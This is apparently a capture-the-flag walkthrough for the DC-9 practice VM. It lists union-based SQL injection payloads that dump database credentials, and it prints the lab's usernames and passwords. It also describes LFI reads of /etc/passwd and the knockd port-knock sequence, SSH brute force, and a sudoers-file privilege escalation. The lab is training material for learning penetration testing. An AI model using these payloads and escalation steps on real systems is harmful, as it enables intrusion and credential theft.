DC: 9 — Walkthrough/Writeup

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

DC: 9
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration…

Enumeration

More Enumeration…

  1. Enumerating the port 80:
  • Nikto Scan
nothing critical
  • Gobuster
  • Manual Enumeration

— Found nothing on the website source code, But while going through the site map generate by the manual enumeration on Burp — got 2 possible injection points.

Ref: http://www.unixwiz.net/techtips/sql-injection.html

  1. /results.php

payload: a’ ‘x’=’x

url-encoded: %61%27%20%4f%52%20%27%78%27%3d%27%78

Then, used sqlmap to check it,

Payload: a’ union all select 1,2,3,4,5,6 — -

url-encoded: %61%27%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d

let’s extract the data without using sqlmap, will be listing the payloads:

  • a’ OR ‘1’=’1
  • a’ UNION ALL SELCT 1,2,3,4,5 — -
  • a’ union all select 1,2,@@version,4,5,6 — -
  • a’ union all select 1,2,3,4,5,schema_name FROM information_schema.schemata — -
  • a’ union all select 1,2,3,4,table_schema,table_name FROM information_schema.tables — -
  • a’ union all select 1,2,CONCAT(TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns — -

DB:Table

Staff:StaffDetails / Staff:Users / users:UserDetails

  • a’ union all select 1,2,CONCAT(COLUMN_NAME,”:”,TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns — -
  • a’ union all select 1,2,CONCAT(COLUMN_NAME,”:”,TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns where TABLE_SCHEMA=”Staff” OR TABLE_SCHEMA=”users” — -

Exfiltration

  • a’ union all select 1,2,CONCAT(username,”:”,password),3,4,5 FROM Staff.Users — -

admin:856f5de590ef37314e7c3bdf6f8a66dc

  • a’ union all select 1,2,CONCAT(username,”:”,password),3,4,5 FROM users.UserDetails — -

marym:3kfs86sfd

julied:468sfdfsd2

fredf:4sfd87sfd1

barneyr:RocksOff

tomc:TC&TheBoyz

jerrym:B8m#48sd

wilmaf:Pebbles

bettyr:BamBam01

chandlerb:UrAG0D!

joeyt:Passw0rd

rachelg:yN72#dsd

rossg:ILoveRachel

monicag:3248dsds7s

phoebeb:smellycats

scoots:YR3BVxxxw87

janitor:Ilovepeepee

janitor2:Hawaii-Five-0


Logging IN

admin:856f5de590ef37314e7c3bdf6f8a66dc

admin:transorbital1

File does not exist stood out to me. So i be testing for possible LFI/RFI using wfuzz.

/etc/passwd

Let’s use wfuzz to find some config files,

it says knockd.sh

So, let’s see the knockd config file,

Sequence: 7469,8475,9842

SSH is open

Brute Force SSH

login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee

login as fredf,

searching for file test.py

Hence, i made a file with context of,

fredf ALL=(ALL) ALL

and executed the following command,


Photo by Aziz Acharki on Unsplash